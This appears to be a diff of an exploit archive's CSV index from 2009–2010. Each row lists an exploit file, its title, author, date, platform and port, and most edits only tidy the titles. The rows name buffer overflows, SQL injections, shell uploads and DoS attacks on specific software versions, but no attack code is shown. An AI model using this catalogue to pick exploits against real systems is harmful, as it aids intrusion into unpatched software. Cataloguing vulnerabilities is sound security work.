10107,platforms/windows/local/10107.pl,"Icarus 2.0 - (.pgn) Universal Local Buffer Overflow Exploit (SEH)",2009-11-17,"D3V!L FUCK3R",windows,local,0 10107,platforms/windows/local/10107.pl,"Icarus 2.0 - (.pgn) Universal Local Buffer Overflow Exploit (SEH)",2009-11-17,"D3V!L FUCK3R",windows,local,0
10160,platforms/windows/dos/10160.py,"FtpXQ authenticated Remote DoS",2009-11-17,"Marc Doudiet",windows,dos,21 10160,platforms/windows/dos/10160.py,"FtpXQ 3.0 - Authenticated Remote DoS",2009-11-17,"Marc Doudiet",windows,dos,21
10161,platforms/asp/webapps/10161.txt,"JBS 2.0 / JBSX - Administration panel Bypass and File Upload Vulnerability",2009-11-17,blackenedsecurity,asp,webapps,0 10161,platforms/asp/webapps/10161.txt,"JBS 2.0 / JBSX - Administration panel Bypass and File Upload Vulnerability",2009-11-17,blackenedsecurity,asp,webapps,0
10162,platforms/windows/remote/10162.py,"Home FTP Server 'MKD' Command Directory Traversal Vulnerability",2009-11-17,zhangmc,windows,remote,21 10162,platforms/windows/remote/10162.py,"Home FTP Server 'MKD' Command Directory Traversal Vulnerability",2009-11-17,zhangmc,windows,remote,21
10163,platforms/windows/dos/10163.pl,"Novell eDirectory HTTPSTK Login Stack Overflow Vulnerability",2009-11-17,karak0rsan,windows,dos,80 10163,platforms/windows/dos/10163.pl,"Novell eDirectory HTTPSTK Login Stack Overflow Vulnerability",2009-11-17,karak0rsan,windows,dos,80
@ -9525,7 +9525,7 @@ id,file,description,date,author,platform,type,port
10220,platforms/php/webapps/10220.txt,"pointcomma <= 3.8b2 - Remote File Inclusion Vulnerability",2009-11-24,"cr4wl3r ",php,webapps,0 10220,platforms/php/webapps/10220.txt,"pointcomma <= 3.8b2 - Remote File Inclusion Vulnerability",2009-11-24,"cr4wl3r ",php,webapps,0
10221,platforms/windows/dos/10221.txt,"XM Easy Personal FTP Server 5.8.0 - Remote DoS Vulnerability",2009-11-24,leinakesi,windows,dos,21 10221,platforms/windows/dos/10221.txt,"XM Easy Personal FTP Server 5.8.0 - Remote DoS Vulnerability",2009-11-24,leinakesi,windows,dos,21
10222,platforms/php/webapps/10222.txt,"W3infotech (Auth Bypass) SQL Injection Vulnerability",2009-11-24,ViRuS_HiMa,php,webapps,0 10222,platforms/php/webapps/10222.txt,"W3infotech (Auth Bypass) SQL Injection Vulnerability",2009-11-24,ViRuS_HiMa,php,webapps,0
10223,platforms/windows/dos/10223.txt,"TYPSoft 1.10 APPE DELE DoS",2009-11-24,leinakesi,windows,dos,21 10223,platforms/windows/dos/10223.txt,"TYPSoft 1.10 - APPE DELE DoS",2009-11-24,leinakesi,windows,dos,21
10224,platforms/php/webapps/10224.txt,"Quick.Cart 3.4 and Quick.CMS 2.4 - CSRF Vulnerabilities",2009-11-24,"Alice Kaerast",php,webapps,0 10224,platforms/php/webapps/10224.txt,"Quick.Cart 3.4 and Quick.CMS 2.4 - CSRF Vulnerabilities",2009-11-24,"Alice Kaerast",php,webapps,0
10225,platforms/windows/webapps/10225.txt,"MDaemon WebAdmin 2.0.x - SQL injection",2006-05-26,KOUSULIN,windows,webapps,1000 10225,platforms/windows/webapps/10225.txt,"MDaemon WebAdmin 2.0.x - SQL injection",2006-05-26,KOUSULIN,windows,webapps,1000
10226,platforms/windows/local/10226.py,"Serenity Audio Player Playlist (.m3u) BOF",2009-11-25,Rick2600,windows,local,0 10226,platforms/windows/local/10226.py,"Serenity Audio Player Playlist (.m3u) BOF",2009-11-25,Rick2600,windows,local,0
@ -9541,7 +9541,7 @@ id,file,description,date,author,platform,type,port
10236,platforms/php/webapps/10236.txt,"Flashden Multiple File Uploader Shell Upload Vulnerability",2009-11-26,DigitALL,php,webapps,0 10236,platforms/php/webapps/10236.txt,"Flashden Multiple File Uploader Shell Upload Vulnerability",2009-11-26,DigitALL,php,webapps,0
10237,platforms/hardware/dos/10237.txt,"Allegro RomPager 2.10 Malformed URL Request DoS Vulnerability",2000-06-01,netsec,hardware,dos,80 10237,platforms/hardware/dos/10237.txt,"Allegro RomPager 2.10 Malformed URL Request DoS Vulnerability",2000-06-01,netsec,hardware,dos,80
10238,platforms/php/webapps/10238.txt,"Joomla Component com_lyftenbloggie 1.04 - Remote SQL Injection Vulnerability",2009-11-28,kaMtiEz,php,webapps,0 10238,platforms/php/webapps/10238.txt,"Joomla Component com_lyftenbloggie 1.04 - Remote SQL Injection Vulnerability",2009-11-28,kaMtiEz,php,webapps,0
10240,platforms/windows/local/10240.py,"Millenium MP3 Studio 2.0 pls Buffer Overflow Exploit",2009-11-28,Molotov,windows,local,0 10240,platforms/windows/local/10240.py,"Millenium MP3 Studio 2.0 - (pls) Buffer Overflow Exploit",2009-11-28,Molotov,windows,local,0
10241,platforms/php/webapps/10241.txt,"Uploaderr 1.0 - File Hosting Script Shell Upload Vulnerability",2009-11-28,DigitALL,php,webapps,0 10241,platforms/php/webapps/10241.txt,"Uploaderr 1.0 - File Hosting Script Shell Upload Vulnerability",2009-11-28,DigitALL,php,webapps,0
10242,platforms/php/webapps/10242.txt,"PHP _multipart/form-data_ Denial of Service Exploit (Python)",2009-11-27,Eren,php,webapps,0 10242,platforms/php/webapps/10242.txt,"PHP _multipart/form-data_ Denial of Service Exploit (Python)",2009-11-27,Eren,php,webapps,0
10243,platforms/php/webapps/10243.txt,"PHP MultiPart Form-Data Denial of Service PoC",2009-11-22,"Bogdan Calin",php,webapps,0 10243,platforms/php/webapps/10243.txt,"PHP MultiPart Form-Data Denial of Service PoC",2009-11-22,"Bogdan Calin",php,webapps,0
@ -9607,9 +9607,9 @@ id,file,description,date,author,platform,type,port
10318,platforms/php/webapps/10318.txt,"Joomla yt_color YOOOtheme XSS and Cookie Stealing",2009-12-04,andresg888,php,webapps,80 10318,platforms/php/webapps/10318.txt,"Joomla yt_color YOOOtheme XSS and Cookie Stealing",2009-12-04,andresg888,php,webapps,80
10319,platforms/windows/local/10319.py,"IDEAL Administration 2009 9.7 - Local Buffer Overflow Exploit",2009-12-05,Dr_IDE,windows,local,0 10319,platforms/windows/local/10319.py,"IDEAL Administration 2009 9.7 - Local Buffer Overflow Exploit",2009-12-05,Dr_IDE,windows,local,0
10320,platforms/windows/local/10320.py,"M3U To ASX-WPL 1.1 (m3u Playlist file) Buffer Overflow Exploit",2009-12-05,"Encrypt3d.M!nd ",windows,local,0 10320,platforms/windows/local/10320.py,"M3U To ASX-WPL 1.1 (m3u Playlist file) Buffer Overflow Exploit",2009-12-05,"Encrypt3d.M!nd ",windows,local,0
10321,platforms/windows/local/10321.py,"HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit",2009-12-05,"Encrypt3d.M!nd ",windows,local,0 10321,platforms/windows/local/10321.py,"HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit",2009-12-05,"Encrypt3d.M!nd ",windows,local,0
10322,platforms/windows/local/10322.py,"Audacity 1.2.6 (gro File) Buffer Overflow Exploit",2009-12-05,"Encrypt3d.M!nd ",windows,local,0 10322,platforms/windows/local/10322.py,"Audacity 1.2.6 (gro File) Buffer Overflow Exploit",2009-12-05,"Encrypt3d.M!nd ",windows,local,0
10323,platforms/windows/local/10323.py,"HTML Help Workshop 4.74 (hhp) Buffer Overflow Exploit (Universal)",2009-12-05,Dz_attacker,windows,local,0 10323,platforms/windows/local/10323.py,"HTML Help Workshop 4.74 - (hhp) Buffer Overflow Exploit (Universal)",2009-12-05,Dz_attacker,windows,local,0
10324,platforms/php/webapps/10324.txt,"phpshop 0.8.1 - Multiple Vulnerabilities",2009-12-05,"Andrea Fabrizi",php,webapps,0 10324,platforms/php/webapps/10324.txt,"phpshop 0.8.1 - Multiple Vulnerabilities",2009-12-05,"Andrea Fabrizi",php,webapps,0
10325,platforms/php/webapps/10325.txt,"Wordpress Image Manager Plugins - Shell Upload Vulnerability",2009-12-05,DigitALL,php,webapps,0 10325,platforms/php/webapps/10325.txt,"Wordpress Image Manager Plugins - Shell Upload Vulnerability",2009-12-05,DigitALL,php,webapps,0
10326,platforms/multiple/local/10326.txt,"Ghostscript < 8.64 - 'gdevpdtb.c' Buffer Overflow Vulnerability",2009-02-03,"Wolfgang Hamann",multiple,local,0 10326,platforms/multiple/local/10326.txt,"Ghostscript < 8.64 - 'gdevpdtb.c' Buffer Overflow Vulnerability",2009-02-03,"Wolfgang Hamann",multiple,local,0
@ -9620,7 +9620,7 @@ id,file,description,date,author,platform,type,port
10332,platforms/windows/local/10332.rb,"IDEAL Administration 2009 9.7 - Buffer Overflow - MSF Universal",2009-12-06,dookie,windows,local,0 10332,platforms/windows/local/10332.rb,"IDEAL Administration 2009 9.7 - Buffer Overflow - MSF Universal",2009-12-06,dookie,windows,local,0
10333,platforms/windows/dos/10333.py,"VLC Media Player 1.0.3 smb:// URI Handling Remote Stack Overflow PoC",2009-12-06,Dr_IDE,windows,dos,0 10333,platforms/windows/dos/10333.py,"VLC Media Player 1.0.3 smb:// URI Handling Remote Stack Overflow PoC",2009-12-06,Dr_IDE,windows,dos,0
10334,platforms/multiple/dos/10334.py,"VLC Media Player <= 1.0.3 RTSP Buffer Overflow PoC (OSX/Linux)",2009-12-06,Dr_IDE,multiple,dos,0 10334,platforms/multiple/dos/10334.py,"VLC Media Player <= 1.0.3 RTSP Buffer Overflow PoC (OSX/Linux)",2009-12-06,Dr_IDE,multiple,dos,0
10335,platforms/windows/local/10335.rb,"HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit (Meta)",2009-12-07,loneferret,windows,local,0 10335,platforms/windows/local/10335.rb,"HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit (Meta)",2009-12-07,loneferret,windows,local,0
10337,platforms/php/webapps/10337.txt,"Chipmunk Newsletter Persistant XSS Vulnerability",2009-12-07,mr_me,php,webapps,0 10337,platforms/php/webapps/10337.txt,"Chipmunk Newsletter Persistant XSS Vulnerability",2009-12-07,mr_me,php,webapps,0
10338,platforms/linux/dos/10338.pl,"Polipo 1.0.4 - Remote Memory Corruption PoC (0day)",2009-12-07,"Jeremy Brown",linux,dos,0 10338,platforms/linux/dos/10338.pl,"Polipo 1.0.4 - Remote Memory Corruption PoC (0day)",2009-12-07,"Jeremy Brown",linux,dos,0
10339,platforms/windows/local/10339.pl,"gAlan 0.2.1 - Buffer Overflow Exploit (0day)",2009-12-07,"Jeremy Brown",windows,local,0 10339,platforms/windows/local/10339.pl,"gAlan 0.2.1 - Buffer Overflow Exploit (0day)",2009-12-07,"Jeremy Brown",windows,local,0
@ -9684,7 +9684,7 @@ id,file,description,date,author,platform,type,port
10408,platforms/php/webapps/10408.txt,"SpireCMS 2.0 - SQL Injection Vulnerability",2009-12-13,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10408,platforms/php/webapps/10408.txt,"SpireCMS 2.0 - SQL Injection Vulnerability",2009-12-13,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
10410,platforms/php/webapps/10410.txt,"phpldapadmin Local File Inclusion",2009-12-10,ipsecs,php,webapps,0 10410,platforms/php/webapps/10410.txt,"phpldapadmin Local File Inclusion",2009-12-10,ipsecs,php,webapps,0
10412,platforms/php/webapps/10412.txt,"Acc PHP eMail 1.1 - CSRF",2009-12-13,bi0,php,webapps,0 10412,platforms/php/webapps/10412.txt,"Acc PHP eMail 1.1 - CSRF",2009-12-13,bi0,php,webapps,0
10414,platforms/php/webapps/10414.txt,"Frog 0.9.5 - CSRF Vulnerability",2009-12-13,"Milos Zivanovic ",php,webapps,0 10414,platforms/php/webapps/10414.txt,"Frog CMS 0.9.5 - CSRF Vulnerability",2009-12-13,"Milos Zivanovic ",php,webapps,0
10417,platforms/php/webapps/10417.txt,"Piwigo 2.0.6 - Multiple Vulnerabilities",2009-12-13,mr_me,php,webapps,0 10417,platforms/php/webapps/10417.txt,"Piwigo 2.0.6 - Multiple Vulnerabilities",2009-12-13,mr_me,php,webapps,0
10418,platforms/php/webapps/10418.txt,"Ele Medios CMS SQL Injection Vulnerability",2009-12-13,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10418,platforms/php/webapps/10418.txt,"Ele Medios CMS SQL Injection Vulnerability",2009-12-13,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
10419,platforms/php/webapps/10419.txt,"Chipmunk Board Script 1.x - Multiple CSRF Vulnerabilities",2009-12-13,"Milos Zivanovic ",php,webapps,0 10419,platforms/php/webapps/10419.txt,"Chipmunk Board Script 1.x - Multiple CSRF Vulnerabilities",2009-12-13,"Milos Zivanovic ",php,webapps,0
@ -9800,7 +9800,7 @@ id,file,description,date,author,platform,type,port
10552,platforms/php/webapps/10552.txt,"FestOs <= 2.2.1 - Multiple RFI Exploit",2009-12-19,"cr4wl3r ",php,webapps,0 10552,platforms/php/webapps/10552.txt,"FestOs <= 2.2.1 - Multiple RFI Exploit",2009-12-19,"cr4wl3r ",php,webapps,0
10553,platforms/hardware/dos/10553.rb,"3Com OfficeConnect Routers Remote DoS Exploit",2009-12-19,"Alberto Ortega Llamas",hardware,dos,0 10553,platforms/hardware/dos/10553.rb,"3Com OfficeConnect Routers Remote DoS Exploit",2009-12-19,"Alberto Ortega Llamas",hardware,dos,0
10555,platforms/php/webapps/10555.txt,"Barracuda Web Firewall 660 Firmware 7.3.1.007 - Vulnerability",2009-12-19,Global-Evolution,php,webapps,0 10555,platforms/php/webapps/10555.txt,"Barracuda Web Firewall 660 Firmware 7.3.1.007 - Vulnerability",2009-12-19,Global-Evolution,php,webapps,0
10556,platforms/windows/local/10556.c,"PlayMeNow Malformed M3U Playlist File Buffer",2009-12-19,Gr33nG0bL1n,windows,local,0 10556,platforms/windows/local/10556.c,"PlayMeNow 7.3 / 7.4 - Malformed M3U Playlist File Buffer",2009-12-19,Gr33nG0bL1n,windows,local,0
10557,platforms/php/local/10557.php,"PHP 5.2.12/5.3.1 symlink() open_basedir bypass",2009-12-19,"Maksymilian Arciemowicz",php,local,0 10557,platforms/php/local/10557.php,"PHP 5.2.12/5.3.1 symlink() open_basedir bypass",2009-12-19,"Maksymilian Arciemowicz",php,local,0
10558,platforms/asp/webapps/10558.txt,"Toast Forums 1.8 - Database Disclosure Vulnerability",2009-12-19,"ViRuSMaN ",asp,webapps,0 10558,platforms/asp/webapps/10558.txt,"Toast Forums 1.8 - Database Disclosure Vulnerability",2009-12-19,"ViRuSMaN ",asp,webapps,0
10560,platforms/php/webapps/10560.txt,"Lizard Cart Multiple SQL Injection Exploit",2009-12-19,"cr4wl3r ",php,webapps,0 10560,platforms/php/webapps/10560.txt,"Lizard Cart Multiple SQL Injection Exploit",2009-12-19,"cr4wl3r ",php,webapps,0
@ -9836,7 +9836,7 @@ id,file,description,date,author,platform,type,port
10593,platforms/windows/dos/10593.txt,"Winamp <= 5.57 - Stack Overflow",2009-12-22,scriptjunkie,windows,dos,0 10593,platforms/windows/dos/10593.txt,"Winamp <= 5.57 - Stack Overflow",2009-12-22,scriptjunkie,windows,dos,0
10594,platforms/php/webapps/10594.txt,"The Uploader 2.0 - Remote File Upload Vulnerability",2009-12-22,"Master Mind",php,webapps,0 10594,platforms/php/webapps/10594.txt,"The Uploader 2.0 - Remote File Upload Vulnerability",2009-12-22,"Master Mind",php,webapps,0
10595,platforms/windows/local/10595.pl,"CoolPlayer 2.18 - M3U Playlist Buffer Overflow Exploit",2009-12-22,data$hack,windows,local,0 10595,platforms/windows/local/10595.pl,"CoolPlayer 2.18 - M3U Playlist Buffer Overflow Exploit",2009-12-22,data$hack,windows,local,0
10596,platforms/windows/local/10596.pl,"PlayMeNow Malformed (M3U) Universal XP Seh BoF",2009-12-22,"ThE g0bL!N",windows,local,0 10596,platforms/windows/local/10596.pl,"PlayMeNow - Malformed (M3U) Universal XP Seh BoF",2009-12-22,"ThE g0bL!N",windows,local,0
10597,platforms/php/webapps/10597.txt,"Active PHP Bookmarks 1.3 - SQL Injection Vulnerability",2009-12-22,Mr.Elgaarh,php,webapps,0 10597,platforms/php/webapps/10597.txt,"Active PHP Bookmarks 1.3 - SQL Injection Vulnerability",2009-12-22,Mr.Elgaarh,php,webapps,0
10598,platforms/php/webapps/10598.txt,"deluxebb <= 1.3 - Multiple Vulnerabilities",2009-12-22,"cp77fk4r ",php,webapps,0 10598,platforms/php/webapps/10598.txt,"deluxebb <= 1.3 - Multiple Vulnerabilities",2009-12-22,"cp77fk4r ",php,webapps,0
10599,platforms/php/webapps/10599.txt,"The Uploader 2.0 File Disclosure Vulnerability",2009-12-22,Stack,php,webapps,0 10599,platforms/php/webapps/10599.txt,"The Uploader 2.0 File Disclosure Vulnerability",2009-12-22,Stack,php,webapps,0
@ -9978,7 +9978,7 @@ id,file,description,date,author,platform,type,port
10759,platforms/windows/local/10759.pl,"M.J.M. Quick Player 1.2 - Stack BOF",2009-12-28,corelanc0d3r,windows,local,0 10759,platforms/windows/local/10759.pl,"M.J.M. Quick Player 1.2 - Stack BOF",2009-12-28,corelanc0d3r,windows,local,0
10760,platforms/php/webapps/10760.txt,"Joomla Component com_calendario Blind SQL Injection Vulnerability",2009-12-28,Mr.tro0oqy,php,webapps,0 10760,platforms/php/webapps/10760.txt,"Joomla Component com_calendario Blind SQL Injection Vulnerability",2009-12-28,Mr.tro0oqy,php,webapps,0
10762,platforms/php/webapps/10762.txt,"Sunbyte e-Flower SQL Injection Vulneralbility",2009-12-28,"Don Tukulesto",php,webapps,0 10762,platforms/php/webapps/10762.txt,"Sunbyte e-Flower SQL Injection Vulneralbility",2009-12-28,"Don Tukulesto",php,webapps,0
10763,platforms/php/webapps/10763.txt,"Dren's PHP Uploader Remote File Upload Vulnerability",2009-12-28,"Cyb3r IntRue",php,webapps,0 10763,platforms/php/webapps/10763.txt,"Dren's PHP Uploader - Remote File Upload Vulnerability",2009-12-28,"Cyb3r IntRue",php,webapps,0
10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 - SEH (0day)",2009-12-29,Lincoln,windows,remote,6660 10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 - SEH (0day)",2009-12-29,Lincoln,windows,remote,6660
10767,platforms/asp/webapps/10767.txt,"jgbbs-3.0beta1 DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0 10767,platforms/asp/webapps/10767.txt,"jgbbs-3.0beta1 DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
10770,platforms/asp/webapps/10770.txt,"PSnews DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0 10770,platforms/asp/webapps/10770.txt,"PSnews DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
@ -9991,7 +9991,7 @@ id,file,description,date,author,platform,type,port
10777,platforms/asp/webapps/10777.txt,"Fully Functional ASP Forum 1.0 DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0 10777,platforms/asp/webapps/10777.txt,"Fully Functional ASP Forum 1.0 DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
10778,platforms/asp/webapps/10778.txt,"makit news/blog poster 3.1 - DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0 10778,platforms/asp/webapps/10778.txt,"makit news/blog poster 3.1 - DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
10779,platforms/php/webapps/10779.txt,"DirectAdmin 1.34.0 - CSRF Create Administrator Vulnerability",2009-12-29,SecurityRules,php,webapps,0 10779,platforms/php/webapps/10779.txt,"DirectAdmin 1.34.0 - CSRF Create Administrator Vulnerability",2009-12-29,SecurityRules,php,webapps,0
10780,platforms/asp/webapps/10780.txt,"ASP Battle Blog DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0 10780,platforms/asp/webapps/10780.txt,"ASP Battle Blog - DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
10781,platforms/php/webapps/10781.txt,"ActiveKB RFI Vulnerability",2009-12-29,indoushka,php,webapps,0 10781,platforms/php/webapps/10781.txt,"ActiveKB RFI Vulnerability",2009-12-29,indoushka,php,webapps,0
10782,platforms/windows/local/10782.pl,"Mini-stream Ripper 3.0.1.1 - (.pls) Universal BoF (Perl)",2009-12-29,jacky,windows,local,0 10782,platforms/windows/local/10782.pl,"Mini-stream Ripper 3.0.1.1 - (.pls) Universal BoF (Perl)",2009-12-29,jacky,windows,local,0
10784,platforms/php/webapps/10784.txt,"eStore 1.0.2 - SQL Injection Vulnerability",2009-12-29,R3VAN_BASTARD,php,webapps,0 10784,platforms/php/webapps/10784.txt,"eStore 1.0.2 - SQL Injection Vulnerability",2009-12-29,R3VAN_BASTARD,php,webapps,0
@ -10092,7 +10092,7 @@ id,file,description,date,author,platform,type,port
10929,platforms/php/webapps/10929.txt,"Wordpress Events Plugin - SQL Injection Vulnerability",2010-01-02,Red-D3v1L,php,webapps,0 10929,platforms/php/webapps/10929.txt,"Wordpress Events Plugin - SQL Injection Vulnerability",2010-01-02,Red-D3v1L,php,webapps,0
10930,platforms/php/webapps/10930.txt,"Left 4 Dead Stats 1.1 - SQL Injection Vulnerability",2010-01-02,Sora,php,webapps,0 10930,platforms/php/webapps/10930.txt,"Left 4 Dead Stats 1.1 - SQL Injection Vulnerability",2010-01-02,Sora,php,webapps,0
10931,platforms/php/webapps/10931.txt,"X7CHAT 1.3.6b - Add Admin Exploit",2010-01-02,d4rk-h4ck3r,php,webapps,0 10931,platforms/php/webapps/10931.txt,"X7CHAT 1.3.6b - Add Admin Exploit",2010-01-02,d4rk-h4ck3r,php,webapps,0
10936,platforms/windows/local/10936.c,"PlayMeNow Malformed M3U Playlist BoF WinXP SP2 Fr",2010-01-03,bibi-info,windows,local,0 10936,platforms/windows/local/10936.c,"PlayMeNow - Malformed M3U Playlist BoF WinXP SP2 Fr",2010-01-03,bibi-info,windows,local,0
10938,platforms/php/webapps/10938.txt,"Service d'upload 1.0.0 - Shell Upload Vulnerability",2010-01-03,indoushka,php,webapps,0 10938,platforms/php/webapps/10938.txt,"Service d'upload 1.0.0 - Shell Upload Vulnerability",2010-01-03,indoushka,php,webapps,0
10940,platforms/asp/webapps/10940.txt,"Football Pool 3.1 - Database Disclosure Vulnerability",2010-01-03,LionTurk,asp,webapps,0 10940,platforms/asp/webapps/10940.txt,"Football Pool 3.1 - Database Disclosure Vulnerability",2010-01-03,LionTurk,asp,webapps,0
10941,platforms/php/webapps/10941.php,"Joomla Component com_aprice Blind SQL Injection Exploit",2010-01-03,FL0RiX,php,webapps,0 10941,platforms/php/webapps/10941.php,"Joomla Component com_aprice Blind SQL Injection Exploit",2010-01-03,FL0RiX,php,webapps,0
@ -10158,7 +10158,7 @@ id,file,description,date,author,platform,type,port
11030,platforms/hardware/webapps/11030.txt,"D-LINK DKVM-IP8 - XSS Vulnerability",2010-01-06,POPCORN,hardware,webapps,0 11030,platforms/hardware/webapps/11030.txt,"D-LINK DKVM-IP8 - XSS Vulnerability",2010-01-06,POPCORN,hardware,webapps,0
11031,platforms/php/webapps/11031.txt,"Milonic News (viewnews) SQL Injection Vulnerability",2010-01-06,Err0R,php,webapps,0 11031,platforms/php/webapps/11031.txt,"Milonic News (viewnews) SQL Injection Vulnerability",2010-01-06,Err0R,php,webapps,0
11033,platforms/php/webapps/11033.txt,"Joomla Component com_kk Blind SQL Injection Vulnerability",2010-01-06,Pyske,php,webapps,0 11033,platforms/php/webapps/11033.txt,"Joomla Component com_kk Blind SQL Injection Vulnerability",2010-01-06,Pyske,php,webapps,0
11034,platforms/windows/dos/11034.txt,"Microsoft HTML Help Compiler (hhc.exe) BoF PoC",2010-01-06,s4squatch,windows,dos,0 11034,platforms/windows/dos/11034.txt,"Microsoft HTML Help Compiler (hhc.exe) - BoF PoC",2010-01-06,s4squatch,windows,dos,0
11035,platforms/php/webapps/11035.txt,"Joomla Component com_king Blind SQL Injection Vulnerability",2010-01-06,Pyske,php,webapps,0 11035,platforms/php/webapps/11035.txt,"Joomla Component com_king Blind SQL Injection Vulnerability",2010-01-06,Pyske,php,webapps,0
11036,platforms/php/webapps/11036.txt,"RoundCube Webmail Multiple Vulerabilities",2010-01-06,"j4ck and Globus",php,webapps,0 11036,platforms/php/webapps/11036.txt,"RoundCube Webmail Multiple Vulerabilities",2010-01-06,"j4ck and Globus",php,webapps,0
11043,platforms/hardware/dos/11043.txt,"Total Multimedia Features - DoS PoC for Sony Ericsson Phones",2010-01-06,Aodrulez,hardware,dos,0 11043,platforms/hardware/dos/11043.txt,"Total Multimedia Features - DoS PoC for Sony Ericsson Phones",2010-01-06,Aodrulez,hardware,dos,0
@ -10937,7 +10937,7 @@ id,file,description,date,author,platform,type,port
11967,platforms/php/webapps/11967.txt,"Snipe Photo Gallery - Bypass Remote Upload Vulnerability",2010-03-30,indoushka,php,webapps,0 11967,platforms/php/webapps/11967.txt,"Snipe Photo Gallery - Bypass Remote Upload Vulnerability",2010-03-30,indoushka,php,webapps,0
11968,platforms/php/webapps/11968.txt,"Hosting-php-dynamic (Auth Bypass) Vulnerability",2010-03-30,indoushka,php,webapps,0 11968,platforms/php/webapps/11968.txt,"Hosting-php-dynamic (Auth Bypass) Vulnerability",2010-03-30,indoushka,php,webapps,0
11973,platforms/windows/remote/11973.txt,"CompleteFTP Server Directory Traversal",2010-03-30,zombiefx,windows,remote,0 11973,platforms/windows/remote/11973.txt,"CompleteFTP Server Directory Traversal",2010-03-30,zombiefx,windows,remote,0
11974,platforms/windows/remote/11974.py,"HP OpenView NNM OvWebHelp.exe CGI Topic Overflow",2010-03-30,"S2 Crew",windows,remote,0 11974,platforms/windows/remote/11974.py,"HP OpenView NNM - OvWebHelp.exe CGI Topic Overflow",2010-03-30,"S2 Crew",windows,remote,0
11975,platforms/windows/dos/11975.rb,"Free MP3 CD Ripper 2.6 - (0day)",2010-03-30,"Richard leahy",windows,dos,0 11975,platforms/windows/dos/11975.rb,"Free MP3 CD Ripper 2.6 - (0day)",2010-03-30,"Richard leahy",windows,dos,0
11976,platforms/windows/local/11976.php,"Free MP3 CD Ripper 2.6 - (wav) 1day Stack Buffer Overflow PoC Exploit",2010-03-31,mr_me,windows,local,0 11976,platforms/windows/local/11976.php,"Free MP3 CD Ripper 2.6 - (wav) 1day Stack Buffer Overflow PoC Exploit",2010-03-31,mr_me,windows,local,0
11977,platforms/windows/dos/11977.pl,"CDTrustee .BAK Local Crash PoC",2010-03-31,anonymous,windows,dos,0 11977,platforms/windows/dos/11977.pl,"CDTrustee .BAK Local Crash PoC",2010-03-31,anonymous,windows,dos,0
@ -11488,7 +11488,7 @@ id,file,description,date,author,platform,type,port
12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 (fckeditor) Remote Arbitrary File Upload Vulnerability",2010-05-12,eidelweiss,php,webapps,0 12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 (fckeditor) Remote Arbitrary File Upload Vulnerability",2010-05-12,eidelweiss,php,webapps,0
12585,platforms/php/webapps/12585.txt,"4images <= 1.7.7 (image_utils.php) Remote Command Execution Vulnerability",2010-05-12,"Sn!pEr.S!Te Hacker",php,webapps,0 12585,platforms/php/webapps/12585.txt,"4images <= 1.7.7 (image_utils.php) Remote Command Execution Vulnerability",2010-05-12,"Sn!pEr.S!Te Hacker",php,webapps,0
12586,platforms/php/webapps/12586.php,"IPB 3.0.1 - SQL Injection Exploit",2010-05-13,Cryptovirus,php,webapps,0 12586,platforms/php/webapps/12586.php,"IPB 3.0.1 - SQL Injection Exploit",2010-05-13,Cryptovirus,php,webapps,0
12587,platforms/linux/remote/12587.c,"wftpd server 3.30 - Multiple Vulnerabilities (0day)",2010-05-13,"fl0 fl0w",linux,remote,21 12587,platforms/linux/remote/12587.c,"WFTPD Server 3.30 - Multiple Vulnerabilities (0day)",2010-05-13,"fl0 fl0w",linux,remote,21
12588,platforms/linux/dos/12588.txt,"Samba - Multiple DoS Vulnerabilities",2010-05-13,"laurent gaffie",linux,dos,0 12588,platforms/linux/dos/12588.txt,"Samba - Multiple DoS Vulnerabilities",2010-05-13,"laurent gaffie",linux,dos,0
12590,platforms/php/webapps/12590.txt,"Joomla Component com_konsultasi (sid) SQL Injection Vulnerability",2010-05-13,c4uR,php,webapps,0 12590,platforms/php/webapps/12590.txt,"Joomla Component com_konsultasi (sid) SQL Injection Vulnerability",2010-05-13,c4uR,php,webapps,0
12591,platforms/php/webapps/12591.txt,"BlaB! Lite <= 0.5 - Remote File Inclusion Vulnerability",2010-05-13,"Sn!pEr.S!Te Hacker",php,webapps,0 12591,platforms/php/webapps/12591.txt,"BlaB! Lite <= 0.5 - Remote File Inclusion Vulnerability",2010-05-13,"Sn!pEr.S!Te Hacker",php,webapps,0
@ -11698,7 +11698,7 @@ id,file,description,date,author,platform,type,port
12822,platforms/php/webapps/12822.txt,"Joomla Component com_jsjobs SQL Injection Vulnerability",2010-05-31,d0lc3,php,webapps,0 12822,platforms/php/webapps/12822.txt,"Joomla Component com_jsjobs SQL Injection Vulnerability",2010-05-31,d0lc3,php,webapps,0
12823,platforms/php/webapps/12823.txt,"musicbox SQL Injection",2010-05-31,titanichacker,php,webapps,0 12823,platforms/php/webapps/12823.txt,"musicbox SQL Injection",2010-05-31,titanichacker,php,webapps,0
12833,platforms/asp/webapps/12833.txt,"Patient folder (THEME ASP) Local SQL Injection Vulnerability",2010-05-31,"SA H4x0r",asp,webapps,0 12833,platforms/asp/webapps/12833.txt,"Patient folder (THEME ASP) Local SQL Injection Vulnerability",2010-05-31,"SA H4x0r",asp,webapps,0
12834,platforms/windows/remote/12834.py,"XFTP 3.0 Build 0239 Long filename Buffer Overflow",2010-06-01,sinn3r,windows,remote,0 12834,platforms/windows/remote/12834.py,"XFTP 3.0 Build 0239 - Long filename Buffer Overflow",2010-06-01,sinn3r,windows,remote,0
